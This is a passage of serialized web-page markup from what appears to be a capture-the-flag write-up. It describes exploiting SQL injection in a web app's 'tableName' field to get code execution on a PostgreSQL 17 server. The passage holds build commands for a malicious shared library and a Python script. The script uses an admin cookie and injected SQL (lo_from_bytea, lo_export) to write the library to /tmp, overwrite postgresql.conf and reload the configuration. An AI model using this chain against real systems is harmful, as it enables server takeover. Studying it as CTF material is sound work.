execve",{"type":34,"tag":315,"props":4744,"children":4745},{"style":338},[4746],{"type":39,"value":351},{"type":34,"tag":315,"props":4748,"children":4749},{"style":354},[4750],{"type":39,"value":357},{"type":34,"tag":315,"props":4752,"children":4753},{"style":360},[4754],{"type":39,"value":4715},{"type":34,"tag":315,"props":4756,"children":4757},{"style":354},[4758],{"type":39,"value":357},{"type":34,"tag":315,"props":4760,"children":4761},{"style":338},[4762],{"type":39,"value":372},{"type":34,"tag":315,"props":4764,"children":4765},{"style":701},[4766],{"type":39,"value":4693},{"type":34,"tag":315,"props":4768,"children":4769},{"style":338},[4770],{"type":39,"value":372},{"type":34,"tag":315,"props":4772,"children":4773},{"style":475},[4774],{"type":39,"value":4728},{"type":34,"tag":315,"props":4776,"children":4777},{"style":338},[4778],{"type":39,"value":616},{"type":34,"tag":315,"props":4780,"children":4782},{"class":317,"line":4781},37,[4783],{"type":34,"tag":315,"props":4784,"children":4785},{"style":338},[4786],{"type":39,"value":4787},"}\n",{"type":34,"tag":48,"props":4789,"children":4790},{},[4791,4793,4799],{"type":39,"value":4792},"To compile our library, it's best to be in an environment identical to the challenge, following the same PostgreSQL version, which is the latest (version 17). I used Docker to have a clean environment, it's important to install ",{"type":34,"tag":59,"props":4794,"children":4796},{"className":4795},[],[4797],{"type":39,"value":4798},"postgresql-server-dev-17",{"type":39,"value":4800}," which will provide the postgres.h library that is essential for compiling our library.",{"type":34,"tag":301,"props":4802,"children":4803},{"lang":3463},[4804],{"type":34,"tag":306,"props":4805,"children":4807},{"className":3467,"code":4806,"language":3463,"meta":7,"style":7},"$> docker pull postgres\n$> docker run -it 76e3e031d245 /bin/bash\n$> apt update && apt install -y posgresql-server-dev-17 gcc vim\n$> gcc \\\n-I$(pg_config --includedir-server) \\\n-shared \\\n-fPIC \\\n-nostartfiles \\\n-o payload.so \\\npayload.c\n$> cat payload.so | base64 -w > payload.b64\n",[4808],{"type":34,"tag":59,"props":4809,"children":4810},{"__ignoreMap":7},[4811,4839,4874,4930,4951,4974,4986,4998,5010,5026,5034],{"type":34,"tag":315,"props":4812,"children":4813},{"class":317,"line":318},[4814,4819,4824,4829,4834],{"type":34,"tag":315,"props":4815,"children":4816},{"style":343},[4817],{"type":39,"value":4818},"$",{"type":34,"tag":315,"props":4820,"children":4821},{"style":701},[4822],{"type":39,"value":4823},"> ",{"type":34,"tag":315,"props":4825,"children":4826},{"style":360},[4827],{"type":39,"value":4828},"docker",{"type":34,"tag":315,"props":4830,"children":4831},{"style":360},[4832],{"type":39,"value":4833}," pull",{"type":34,"tag":315,"props":4835,"children":4836},{"style":360},[4837],{"type":39,"value":4838}," postgres\n",{"type":34,"tag":315,"props":4840,"children":4841},{"class":317,"line":328},[4842,4846,4850,4854,4859,4864,4869],{"type":34,"tag":315,"props":4843,"children":4844},{"style":343},[4845],{"type":39,"value":4818},{"type":34,"tag":315,"props":4847,"children":4848},{"style":701},[4849],{"type":39,"value":4823},{"type":34,"tag":315,"props":4851,"children":4852},{"style":360},[4853],{"type":39,"value":4828},{"type":34,"tag":315,"props":4855,"children":4856},{"style":360},[4857],{"type":39,"value":4858}," run",{"type":34,"tag":315,"props":4860,"children":4861},{"style":3541},[4862],{"type":39,"value":4863}," -it",{"type":34,"tag":315,"props":4865,"children":4866},{"style":360},[4867],{"type":39,"value":4868}," 76e3e031d245",{"type":34,"tag":315,"props":4870,"children":4871},{"style":360},[4872],{"type":39,"value":4873}," /bin/bash\n",{"type":34,"tag":315,"props":4875,"children":4876},{"class":317,"line":423},[4877,4881,4885,4890,4895,4900,4905,4910,4915,4920,4925],{"type":34,"tag":315,"props":4878,"children":4879},{"style":343},[4880],{"type":39,"value":4818},{"type":34,"tag":315,"props":4882,"children":4883},{"style":701},[4884],{"type":39,"value":4823},{"type":34,"tag":315,"props":4886,"children":4887},{"style":360},[4888],{"type":39,"value":4889},"apt",{"type":34,"tag":315,"props":4891,"children":4892},{"style":360},[4893],{"type":39,"value":4894}," update",{"type":34,"tag":315,"props":4896,"children":4897},{"style":338},[4898],{"type":39,"value":4899}," &&",{"type":34,"tag":315,"props":4901,"children":4902},{"style":343},[4903],{"type":39,"value":4904}," apt",{"type":34,"tag":315,"props":4906,"children":4907},{"style":360},[4908],{"type":39,"value":4909}," install",{"type":34,"tag":315,"props":4911,"children":4912},{"style":3541},[4913],{"type":39,"value":4914}," -y",{"type":34,"tag":315,"props":4916,"children":4917},{"style":360},[4918],{"type":39,"value":4919}," posgresql-server-dev-17",{"type":34,"tag":315,"props":4921,"children":4922},{"style":360},[4923],{"type":39,"value":4924}," gcc",{"type":34,"tag":315,"props":4926,"children":4927},{"style":360},[4928],{"type":39,"value":4929}," vim\n",{"type":34,"tag":315,"props":4931,"children":4932},{"class":317,"line":471},[4933,4937,4941,4946],{"type":34,"tag":315,"props":4934,"children":4935},{"style":343},[4936],{"type":39,"value":4818},{"type":34,"tag":315,"props":4938,"children":4939},{"style":701},[4940],{"type":39,"value":4823},{"type":34,"tag":315,"props":4942,"children":4943},{"style":360},[4944],{"type":39,"value":4945},"gcc",{"type":34,"tag":315,"props":4947,"children":4948},{"style":3541},[4949],{"type":39,"value":4950}," \\\n",{"type":34,"tag":315,"props":4952,"children":4953},{"class":317,"line":485},[4954,4959,4964,4969],{"type":34,"tag":315,"props":4955,"children":4956},{"style":701},[4957],{"type":39,"value":4958},"-I$(pg_config ",{"type":34,"tag":315,"props":4960,"children":4961},{"style":3541},[4962],{"type":39,"value":4963},"--includedir-server",{"type":34,"tag":315,"props":4965,"children":4966},{"style":701},[4967],{"type":39,"value":4968},") ",{"type":34,"tag":315,"props":4970,"children":4971},{"style":3541},[4972],{"type":39,"value":4973},"\\\n",{"type":34,"tag":315,"props":4975,"children":4976},{"class":317,"line":541},[4977,4982],{"type":34,"tag":315,"props":4978,"children":4979},{"style":343},[4980],{"type":39,"value":4981},"-shared",{"type":34,"tag":315,"props":4983,"children":4984},{"style":3541},[4985],{"type":39,"value":4950},{"type":34,"tag":315,"props":4987,"children":4988},{"class":317,"line":551},[4989,4994],{"type":34,"tag":315,"props":4990,"children":4991},{"style":701},[4992],{"type":39,"value":4993},"-fPIC ",{"type":34,"tag":315,"props":4995,"children":4996},{"style":3541},[4997],{"type":39,"value":4973},{"type":34,"tag":315,"props":4999,"children":5000},{"class":317,"line":570},[5001,5006],{"type":34,"tag":315,"props":5002,"children":5003},{"style":701},[5004],{"type":39,"value":5005},"-nostartfiles ",{"type":34,"tag":315,"props":5007,"children":5008},{"style":3541},[5009],{"type":39,"value":4973},{"type":34,"tag":315,"props":5011,"children":5012},{"class":317,"line":578},[5013,5018,5022],{"type":34,"tag":315,"props":5014,"children":5015},{"style":701},[5016],{"type":39,"value":5017},"-o ",{"type":34,"tag":315,"props":5019,"children":5020},{"style":360},[5021],{"type":39,"value":3881},{"type":34,"tag":315,"props":5023,"children":5024},{"style":3541},[5025],{"type":39,"value":4950},{"type":34,"tag":315,"props":5027,"children":5028},{"class":317,"line":619},[5029],{"type":34,"tag":315,"props":5030,"children":5031},{"style":701},[5032],{"type":39,"value":5033},"payload.c\n",{"type":34,"tag":315,"props":5035,"children":5036},{"class":317,"line":671},[5037,5041,5045,5050,5055,5060,5065,5070,5074],{"type":34,"tag":315,"props":5038,"children":5039},{"style":343},[5040],{"type":39,"value":4818},{"type":34,"tag":315,"props":5042,"children":5043},{"style":701},[5044],{"type":39,"value":4823},{"type":34,"tag":315,"props":5046,"children":5047},{"style":360},[5048],{"type":39,"value":5049},"cat",{"type":34,"tag":315,"props":5051,"children":5052},{"style":360},[5053],{"type":39,"value":5054}," payload.so",{"type":34,"tag":315,"props":5056,"children":5057},{"style":384},[5058],{"type":39,"value":5059}," |",{"type":34,"tag":315,"props":5061,"children":5062},{"style":343},[5063],{"type":39,"value":5064}," base64",{"type":34,"tag":315,"props":5066,"children":5067},{"style":3541},[5068],{"type":39,"value":5069}," -w",{"type":34,"tag":315,"props":5071,"children":5072},{"style":384},[5073],{"type":39,"value":1460},{"type":34,"tag":315,"props":5075,"children":5076},{"style":360},[5077],{"type":39,"value":5078}," payload.b64\n",{"type":34,"tag":48,"props":5080,"children":5081},{},[5082],{"type":39,"value":5083},"Once our payload is compiled, we will encode it in base64.",{"type":34,"tag":48,"props":5085,"children":5086},{},[5087],{"type":39,"value":5088},"We will use a Python script that will automate the writing of files to the filesystem, the script will write the library to /tmp and overwrite the new library. Once everything is written, the configuration needs to be reloaded, for reasons unknown it is essential to reload the configuration multiple times to have an effect.",{"type":34,"tag":301,"props":5090,"children":5092},{"lang":5091},"python",[5093],{"type":34,"tag":306,"props":5094,"children":5097},{"className":5095,"code":5096,"language":5091,"meta":7,"style":7},"language-python shiki shiki-themes vitesse-dark","import requests\nimport base64\nimport random\n\n\nSESSION_COOKIE = 'connect.sid=\u003CADMIN_COOKIE>'\nBASE_URL = 'http://\u003CCHALLENGE_IP:PORT>/table'\nheaders = {\n    'Cookie': SESSION_COOKIE\n}\n\ndef get_randnum():\n    return random.randint(0, 31337*5)\n\ndef exec_payload(sql):\n    body = {\"tableName\": f\"users\\\" where 1=({sql})--\"}\n    res = requests.post(BASE_URL, headers=headers, json=body)\n    print(res.status_code)\n    \n\ndef file_to_base64(file_path):\n    with open(file_path, \"rb\") as file:\n        base64_encoded = base64.b64encode(file.read()).decode(\"utf-8\")\n    return base64_encoded\n\ndef read_base64file(file_path):\n    with open(file_path, \"r\") as file:\n        base64_content = file.read()\n    return base64_content\n\nif __name__ == \"__main__\":\n    # upload b64 so\n    payload = read_base64file(\"payload.b64\")\n    current_id = get_randnum()\n    \n    exec_payload(f\"SELECT lo_from_bytea({current_id}, decode('{payload}', 'base64'))\")\n    exec_payload(f\"SELECT lo_export({current_id}, '/tmp/payload.so')\")\n\n    # upload conf\n    conf = file_to_base64(\"conf\")\n    current_id = get_randnum()\n    \n    exec_payload(f\"SELECT lo_from_bytea({current_id}, decode('{conf}', 'base64'))\")\n    exec_payload(f\"SELECT lo_export({current_id}, '/var/lib/postgresql/data/postgresql.conf')\")\n\n    # reload conf\n    exec_payload(f\"SELECT pg_reload_conf()\")\n    exec_payload(f\"SELECT pg_reload_conf()\")\n    exec_payload(f\"SELECT pg_reload_conf()\")\n\n",[5098],{"type":34,"tag":59,"props":5099,"children":5100},{"__ignoreMap":7},[5101,5114,5126,5138,5145,5152,5178,5203,5219,5245,5252,5259,5277,5329,5336,5362,5435,5507,5537,5545,5552,5577,5633,5707,5719,5726,5750,5802,5830,5842,5849,5884,5892,5929,5949,5956,6018,6059,6067,6076,6113,6133,6141,6197,6238,6246,6255,6280,6304],{"type":34,"tag":315,"props":5102,"children":5103},{"class":317,"line":318},[5104,5109],{"type":34,"tag":315,"props":5105,"children":5106},{"style":475},[5107],{"type":39,"value":5108},"import",{"type":34,"tag":315,"props":5110,"children":5111},{"style":701},[5112],{"type":39,"value":5113}," requests\n",{"type":34,"tag":315,"props":5115,"children":5116},{"class":317,"line":328},[5117,5121],{"type":34,"tag":315,"props":5118,"children":5119},{"style":475},[5120],{"type":39,"value":5108},{"type":34,"tag":315,"props":5122,"children":5123},{"style":701},[5124],{"type":39,"value":5125}," base64\n",{"type":34,"tag":315,"props":5127,"children":5128},{"class":317,"line":423},[5129,5133],{"type":34,"tag":315,"props":5130,"children":5131},{"style":475},[5132],{"type":39,"value":5108},{"type":34,"tag":315,"props":5134,"children":5135},{"style":701},[5136],{"type":39,"value":5137}," random\n",{"type":34,"tag":315,"props":5139,"children":5140},{"class":317,"line":471},[5141],{"type":34,"tag":315,"props":5142,"children":5143},{"emptyLinePlaceholder":545},[5144],{"type":39,"value":548},{"type":34,"tag":315,"props":5146,"children":5147},{"class":317,"line":485},[5148],{"type":34,"tag":315,"props":5149,"children":5150},{"emptyLinePlaceholder":545},[5151],{"type":39,"value":548},{"type":34,"tag":315,"props":5153,"children":5154},{"class":317,"line":541},[5155,5160,5164,5168,5173],{"type":34,"tag":315,"props":5156,"children":5157},{"style":3541},[5158],{"type":39,"value":5159},"SESSION_COOKIE",{"type":34,"tag":315,"props":5161,"children":5162},{"style":338},[5163],{"type":39,"value":449},{"type":34,"tag":315,"props":5165,"children":5166},{"style":354},[5167],{"type":39,"value":1553},{"type":34,"tag":315,"props":5169,"children":5170},{"style":360},[5171],{"type":39,"value":5172},"connect.sid=\u003CADMIN_COOKIE>",{"type":34,"tag":315,"props":5174,"children":5175},{"style":354},[5176],{"type":39,"value":5177},"'\n",{"type":34,"tag":315,"props":5179,"children":5180},{"class":317,"line":551},[5181,5186,5190,5194,5199],{"type":34,"tag":315,"props":5182,"children":5183},{"style":3541},[5184],{"type":39,"value":5185},"BASE_URL",{"type":34,"tag":315,"props":5187,"children":5188},{"style":338},[5189],{"type":39,"value":449},{"type":34,"tag":315,"props":5191,"children":5192},{"style":354},[5193],{"type":39,"value":1553},{"type":34,"tag":315,"props":5195,"children":5196},{"style":360},[5197],{"type":39,"value":5198},"http://\u003CCHALLENGE_IP:PORT>/table",{"type":34,"tag":315,"props":5200,"children":5201},{"style":354},[5202],{"type":39,"value":5177},{"type":34,"tag":315,"props":5204,"children":5205},{"class":317,"line":570},[5206,5211,5215],{"type":34,"tag":315,"props":5207,"children":5208},{"style":701},[5209],{"type":39,"value":5210},"headers ",{"type":34,"tag":315,"props":5212,"children":5213},{"style":338},[5214],{"type":39,"value":803},{"type":34,"tag":315,"props":5216,"children":5217},{"style":338},[5218],{"type":39,"value":420},{"type":34,"tag":315,"props":5220,"children":5221},{"class":317,"line":578},[5222,5227,5232,5236,5240],{"type":34,"tag":315,"props":5223,"children":5224},{"style":354},[5225],{"type":39,"value":5226},"    '",{"type":34,"tag":315,"props":5228,"children":5229},{"style":360},[5230],{"type":39,"value":5231},"Cookie",{"type":34,"tag":315,"props":5233,"children":5234},{"style":354},[5235],{"type":39,"value":852},{"type":34,"tag":315,"props":5237,"children":5238},{"style":338},[5239],{"type":39,"value":650},{"type":34,"tag":315,"props":5241,"children":5242},{"style":3541},[5243],{"type":39,"value":5244}," SESSION_COOKIE\n",{"type":34,"tag":315,"props":5246,"children":5247},{"class":317,"line":619},[5248],{"type":34,"tag":315,"props":5249,"children":5250},{"style":338},[5251],{"type":39,"value":4787},{"type":34,"tag":315,"props":5253,"children":5254},{"class":317,"line":671},[5255],{"type":34,"tag":315,"props":5256,"children":5257},{"emptyLinePlaceholder":545},[5258],{"type":39,"value":548},{"type":34,"tag":315,"props":5260,"children":5261},{"class":317,"line":680},[5262,5267,5272],{"type":34,"tag":315,"props":5263,"children":5264},{"style":384},[5265],{"type":39,"value":5266},"def",{"type":34,"tag":315,"props":5268,"children":5269},{"style":343},[5270],{"type":39,"value":5271}," get_randnum",{"type":34,"tag":315,"props":5273,"children":5274},{"style":338},[5275],{"type":39,"value":5276},"():\n",{"type":34,"tag":315,"props":5278,"children":5279},{"class":317,"line":697},[5280,5284,5289,5293,5298,5302,5307,5311,5316,5320,5325],{"type":34,"tag":315,"props":5281,"children":5282},{"style":475},[5283],{"type":39,"value":1624},{"type":34,"tag":315,"props":5285,"children":5286},{"style":701},[5287],{"type":39,"value":5288}," random",{"type":34,"tag":315,"props":5290,"children":5291},{"style":338},[5292],{"type":39,"value":66},{"type":34,"tag":315,"props":5294,"children":5295},{"style":701},[5296],{"type":39,"value":5297},"randint",{"type":34,"tag":315,"props":5299,"children":5300},{"style":338},[5301],{"type":39,"value":351},{"type":34,"tag":315,"props":5303,"children":5304},{"style":1463},[5305],{"type":39,"value":5306},"0",{"type":34,"tag":315,"props":5308,"children":5309},{"style":338},[5310],{"type":39,"value":372},{"type":34,"tag":315,"props":5312,"children":5313},{"style":1463},[5314],{"type":39,"value":5315}," 31337",{"type":34,"tag":315,"props":5317,"children":5318},{"style":384},[5319],{"type":39,"value":4533},{"type":34,"tag":315,"props":5321,"children":5322},{"style":1463},[5323],{"type":39,"value":5324},"5",{"type":34,"tag":315,"props":5326,"children":5327},{"style":338},[5328],{"type":39,"value":3226},{"type":34,"tag":315,"props":5330,"children":5331},{"class":317,"line":707},[5332],{"type":34,"tag":315,"props":5333,"children":5334},{"emptyLinePlaceholder":545},[5335],{"type":39,"value":548},{"type":34,"tag":315,"props":5337,"children":5338},{"class":317,"line":1805},[5339,5343,5348,5352,5357],{"type":34,"tag":315,"props":5340,"children":5341},{"style":384},[5342],{"type":39,"value":5266},{"type":34,"tag":315,"props":5344,"children":5345},{"style":343},[5346],{"type":39,"value":5347}," exec_payload",{"type":34,"tag":315,"props":5349,"children":5350},{"style":338},[5351],{"type":39,"value":351},{"type":34,"tag":315,"props":5353,"children":5354},{"style":701},[5355],{"type":39,"value":5356},"sql",{"type":34,"tag":315,"props":5358,"children":5359},{"style":338},[5360],{"type":39,"value":5361},"):\n",{"type":34,"tag":315,"props":5363,"children":5364},{"class":317,"line":1915},[5365,5370,5374,5378,5382,5386,5390,5394,5399,5404,5409,5414,5418,5422,5426,5431],{"type":34,"tag":315,"props":5366,"children":5367},{"style":701},[5368],{"type":39,"value":5369},"    body ",{"type":34,"tag":315,"props":5371,"children":5372},{"style":338},[5373],{"type":39,"value":803},{"type":34,"tag":315,"props":5375,"children":5376},{"style":338},[5377],{"type":39,"value":434},{"type":34,"tag":315,"props":5379,"children":5380},{"style":354},[5381],{"type":39,"value":357},{"type":34,"tag":315,"props":5383,"children":5384},{"style":360},[5385],{"type":39,"value":520},{"type":34,"tag":315,"props":5387,"children":5388},{"style":354},[5389],{"type":39,"value":357},{"type":34,"tag":315,"props":5391,"children":5392},{"style":338},[5393],{"type":39,"value":650},{"type":34,"tag":315,"props":5395,"children":5396},{"style":384},[5397],{"type":39,"value":5398}," f",{"type":34,"tag":315,"props":5400,"children":5401},{"style":360},[5402],{"type":39,"value":5403},"\"users",{"type":34,"tag":315,"props":5405,"children":5406},{"style":3541},[5407],{"type":39,"value":5408},"\\\"",{"type":34,"tag":315,"props":5410,"children":5411},{"style":360},[5412],{"type":39,"value":5413}," where 1=(",{"type":34,"tag":315,"props":5415,"children":5416},{"style":3541},[5417],{"type":39,"value":2066},{"type":34,"tag":315,"props":5419,"children":5420},{"style":701},[5421],{"type":39,"value":5356},{"type":34,"tag":315,"props":5423,"children":5424},{"style":3541},[5425],{"type":39,"value":525},{"type":34,"tag":315,"props":5427,"children":5428},{"style":360},[5429],{"type":39,"value":5430},")--\"",{"type":34,"tag":315,"props":5432,"children":5433},{"style":338},[5434],{"type":39,"value":4787},{"type":34,"tag":315,"props":5436,"children":5437},{"class":317,"line":1932},[5438,5443,5447,5452,5456,5460,5464,5468,5472,5477,5481,5486,5490,5495,5499,5503],{"type":34,"tag":315,"props":5439,"children":5440},{"style":701},[5441],{"type":39,"value":5442},"    res ",{"type":34,"tag":315,"props":5444,"children":5445},{"style":338},[5446],{"type":39,"value":803},{"type":34,"tag":315,"props":5448,"children":5449},{"style":701},[5450],{"type":39,"value":5451}," requests",{"type":34,"tag":315,"props":5453,"children":5454},{"style":338},[5455],{"type":39,"value":66},{"type":34,"tag":315,"props":5457,"children":5458},{"style":701},[5459],{"type":39,"value":346},{"type":34,"tag":315,"props":5461,"children":5462},{"style":338},[5463],{"type":39,"value":351},{"type":34,"tag":315,"props":5465,"children":5466},{"style":3541},[5467],{"type":39,"value":5185},{"type":34,"tag":315,"props":5469,"children":5470},{"style":338},[5471],{"type":39,"value":372},{"type":34,"tag":315,"props":5473,"children":5474},{"style":332},[5475],{"type":39,"value":5476}," headers",{"type":34,"tag":315,"props":5478,"children":5479},{"style":338},[5480],{"type":39,"value":803},{"type":34,"tag":315,"props":5482,"children":5483},{"style":701},[5484],{"type":39,"value":5485},"headers",{"type":34,"tag":315,"props":5487,"children":5488},{"style":338},[5489],{"type":39,"value":372},{"type":34,"tag":315,"props":5491,"children":5492},{"style":332},[5493],{"type":39,"value":5494}," json",{"type":34,"tag":315,"props":5496,"children":5497},{"style":338},[5498],{"type":39,"value":803},{"type":34,"tag":315,"props":5500,"children":5501},{"style":701},[5502],{"type":39,"value":463},{"type":34,"tag":315,"props":5504,"children":5505},{"style":338},[5506],{"type":39,"value":3226},{"type":34,"tag":315,"props":5508,"children":5509},{"class":317,"line":2029},[5510,5515,5519,5524,5528,5533],{"type":34,"tag":315,"props":5511,"children":5512},{"style":642},[5513],{"type":39,"value":5514},"    print",{"type":34,"tag":315,"props":5516,"children":5517},{"style":338},[5518],{"type":39,"value":351},{"type":34,"tag":315,"props":5520,"children":5521},{"style":701},[5522],{"type":39,"value":5523},"res",{"type":34,"tag":315,"props":5525,"children":5526},{"style":338},[5527],{"type":39,"value":66},{"type":34,"tag":315,"props":5529,"children":5530},{"style":701},[5531],{"type":39,"value":5532},"status_code",{"type":34,"tag":315,"props":5534,"children":5535},{"style":338},[5536],{"type":39,"value":3226},{"type":34,"tag":315,"props":5538,"children":5539},{"class":317,"line":2037},[5540],{"type":34,"tag":315,"props":5541,"children":5542},{"style":701},[5543],{"type":39,"value":5544},"    \n",{"type":34,"tag":315,"props":5546,"children":5547},{"class":317,"line":4247},[5548],{"type":34,"tag":315,"props":5549,"children":5550},{"emptyLinePlaceholder":545},[5551],{"type":39,"value":548},{"type":34,"tag":315,"props":5553,"children":5554},{"class":317,"line":4255},[5555,5559,5564,5568,5573],{"type":34,"tag":315,"props":5556,"children":5557},{"style":384},[5558],{"type":39,"value":5266},{"type":34,"tag":315,"props":5560,"children":5561},{"style":343},[5562],{"type":39,"value":5563}," file_to_base64",{"type":34,"tag":315,"props":5565,"children":5566},{"style":338},[5567],{"type":39,"value":351},{"type":34,"tag":315,"props":5569,"children":5570},{"style":701},[5571],{"type":39,"value":5572},"file_path",{"type":34,"tag":315,"props":5574,"children":5575},{"style":338},[5576],{"type":39,"value":5361},{"type":34,"tag":315,"props":5578,"children":5579},{"class":317,"line":4282},[5580,5585,5590,5594,5598,5602,5606,5611,5615,5619,5624,5629],{"type":34,"tag":315,"props":5581,"children":5582},{"style":475},[5583],{"type":39,"value":5584},"    with",{"type":34,"tag":315,"props":5586,"children":5587},{"style":642},[5588],{"type":39,"value":5589}," open",{"type":34,"tag":315,"props":5591,"children":5592},{"style":338},[5593],{"type":39,"value":351},{"type":34,"tag":315,"props":5595,"children":5596},{"style":701},[5597],{"type":39,"value":5572},{"type":34,"tag":315,"props":5599,"children":5600},{"style":338},[5601],{"type":39,"value":372},{"type":34,"tag":315,"props":5603,"children":5604},{"style":354},[5605],{"type":39,"value":3511},{"type":34,"tag":315,"props":5607,"children":5608},{"style":360},[5609],{"type":39,"value":5610},"rb",{"type":34,"tag":315,"props":5612,"children":5613},{"style":354},[5614],{"type":39,"value":357},{"type":34,"tag":315,"props":5616,"children":5617},{"style":338},[5618],{"type":39,"value":177},{"type":34,"tag":315,"props":5620,"children":5621},{"style":475},[5622],{"type":39,"value":5623}," as",{"type":34,"tag":315,"props":5625,"children":5626},{"style":332},[5627],{"type":39,"value":5628}," file",{"type":34,"tag":315,"props":5630,"children":5631},{"style":338},[5632],{"type":39,"value":93},{"type":34,"tag":315,"props":5634,"children":5635},{"class":317,"line":4300},[5636,5641,5645,5649,5653,5658,5662,5667,5671,5676,5681,5686,5690,5694,5699,5703],{"type":34,"tag":315,"props":5637,"children":5638},{"style":701},[5639],{"type":39,"value":5640},"        base64_encoded ",{"type":34,"tag":315,"props":5642,"children":5643},{"style":338},[5644],{"type":39,"value":803},{"type":34,"tag":315,"props":5646,"children":5647},{"style":701},[5648],{"type":39,"value":5064},{"type":34,"tag":315,"props":5650,"children":5651},{"style":338},[5652],{"type":39,"value":66},{"type":34,"tag":315,"props":5654,"children":5655},{"style":701},[5656],{"type":39,"value":5657},"b64encode",{"type":34,"tag":315,"props":5659,"children":5660},{"style":338},[5661],{"type":39,"value":351},{"type":34,"tag":315,"props":5663,"children":5664},{"style":332},[5665],{"type":39,"value":5666},"file",{"type":34,"tag":315,"props":5668,"children":5669},{"style":338},[5670],{"type":39,"value":66},{"type":34,"tag":315,"props":5672,"children":5673},{"style":701},[5674],{"type":39,"value":5675},"read",{"type":34,"tag":315,"props":5677,"children":5678},{"style":338},[5679],{"type":39,"value":5680},"()).",{"type":34,"tag":315,"props":5682,"children":5683},{"style":701},[5684],{"type":39,"value":5685},"decode",{"type":34,"tag":315,"props":5687,"children":5688},{"style":338},[5689],{"type":39,"value":351},{"type":34,"tag":315,"props":5691,"children":5692},{"style":354},[5693],{"type":39,"value":357},{"type":34,"tag":315,"props":5695,"children":5696},{"style":360},[5697],{"type":39,"value":5698},"utf-8",{"type":34,"tag":315,"props":5700,"children":5701},{"style":354},[5702],{"type":39,"value":357},{"type":34,"tag":315,"props":5704,"children":5705},{"style":338},[5706],{"type":39,"value":3226},{"type":34,"tag":315,"props":5708,"children":5709},{"class":317,"line":4308},[5710,5714],{"type":34,"tag":315,"props":5711,"children":5712},{"style":475},[5713],{"type":39,"value":1624},{"type":34,"tag":315,"props":5715,"children":5716},{"style":701},[5717],{"type":39,"value":5718}," base64_encoded\n",{"type":34,"tag":315,"props":5720,"children":5721},{"class":317,"line":4361},[5722],{"type":34,"tag":315,"props":5723,"children":5724},{"emptyLinePlaceholder":545},[5725],{"type":39,"value":548},{"type":34,"tag":315,"props":5727,"children":5728},{"class":317,"line":4392},[5729,5733,5738,5742,5746],{"type":34,"tag":315,"props":5730,"children":5731},{"style":384},[5732],{"type":39,"value":5266},{"type":34,"tag":315,"props":5734,"children":5735},{"style":343},[5736],{"type":39,"value":5737}," read_base64file",{"type":34,"tag":315,"props":5739,"children":5740},{"style":338},[5741],{"type":39,"value":351},{"type":34,"tag":315,"props":5743,"children":5744},{"style":701},[5745],{"type":39,"value":5572},{"type":34,"tag":315,"props":5747,"children":5748},{"style":338},[5749],{"type":39,"value":5361},{"type":34,"tag":315,"props":5751,"children":5752},{"class":317,"line":4431},[5753,5757,5761,5765,5769,5773,5777,5782,5786,5790,5794,5798],{"type":34,"tag":315,"props":5754,"children":5755},{"style":475},[5756],{"type":39,"value":5584},{"type":34,"tag":315,"props":5758,"children":5759},{"style":642},[5760],{"type":39,"value":5589},{"type":34,"tag":315,"props":5762,"children":5763},{"style":338},[5764],{"type":39,"value":351},{"type":34,"tag":315,"props":5766,"children":5767},{"style":701},[5768],{"type":39,"value":5572},{"type":34,"tag":315,"props":5770,"children":5771},{"style":338},[5772],{"type":39,"value":372},{"type":34,"tag":315,"props":5774,"children":5775},{"style":354},[5776],{"type":39,"value":3511},{"type":34,"tag":315,"props":5778,"children":5779},{"style":360},[5780],{"type":39,"value":5781},"r",{"type":34,"tag":315,"props":5783,"children":5784},{"style":354},[5785],{"type":39,"value":357},{"type":34,"tag":315,"props":5787,"children":5788},{"style":338},[5789],{"type":39,"value":177},{"type":34,"tag":315,"props":5791,"children":5792},{"style":475},[5793],{"type":39,"value":5623},{"type":34,"tag":315,"props":5795,"children":5796},{"style":332},[5797],{"type":39,"value":5628},{"type":34,"tag":315,"props":5799,"children":5800},{"style":338},[5801],{"type":39,"value":93},{"type":34,"tag":315,"props":5803,"children":5804},{"class":317,"line":4487},[5805,5810,5814,5818,5822,5826],{"type":34,"tag":315,"props":5806,"children":5807},{"style":701},[5808],{"type":39,"value":5809},"        base64_content ",{"type":34,"tag":315,"props":5811,"children":5812},{"style":338},[5813],{"type":39,"value":803},{"type":34,"tag":315,"props":5815,"children":5816},{"style":332},[5817],{"type":39,"value":5628},{"type":34,"tag":315,"props":5819,"children":5820},{"style":338},[5821],{"type":39,"value":66},{"type":34,"tag":315,"props":5823,"children":5824},{"style":701},[5825],{"type":39,"value":5675},{"type":34,"tag":315,"props":5827,"children":5828},{"style":338},[5829],{"type":39,"value":2686},{"type":34,"tag":315,"props":5831,"children":5832},{"class":317,"line":4495},[5833,5837],{"type":34,"tag":315,"props":5834,"children":5835},{"style":475},[5836],{"type":39,"value":1624},{"type":34,"tag":315,"props":5838,"children":5839},{"style":701},[5840],{"type":39,"value":5841}," base64_content\n",{"type":34,"tag":315,"props":5843,"children":5844},{"class":317,"line":4555},[5845],{"type":34,"tag":315,"props":5846,"children":5847},{"emptyLinePlaceholder":545},[5848],{"type":39,"value":548},{"type":34,"tag":315,"props":5850,"children":5851},{"class":317,"line":4577},[5852,5857,5862,5867,5871,5876,5880],{"type":34,"tag":315,"props":5853,"children":5854},{"style":475},[5855],{"type":39,"value":5856},"if",{"type":34,"tag":315,"props":5858,"children":5859},{"style":642},[5860],{"type":39,"value":5861}," __name__",{"type":34,"tag":315,"props":5863,"children":5864},{"style":384},[5865],{"type":39,"value":5866}," ==",{"type":34,"tag":315,"props":5868,"children":5869},{"style":354},[5870],{"type":39,"value":3511},{"type":34,"tag":315,"props":5872,"children":5873},{"style":360},[5874],{"type":39,"value":5875},"__main__",{"type":34,"tag":315,"props":5877,"children":5878},{"style":354},[5879],{"type":39,"value":357},{"type":34,"tag":315,"props":5881,"children":5882},{"style":338},[5883],{"type":39,"value":93},{"type":34,"tag":315,"props":5885,"children":5886},{"class":317,"line":4606},[5887],{"type":34,"tag":315,"props":5888,"children":5889},{"style":322},[5890],{"type":39,"value":5891},"    # upload b64 so\n",{"type":34,"tag":315,"props":5893,"children":5894},{"class":317,"line":4635},[5895,5900,5904,5908,5912,5916,5921,5925],{"type":34,"tag":315,"props":5896,"children":5897},{"style":701},[5898],{"type":39,"value":5899},"    payload 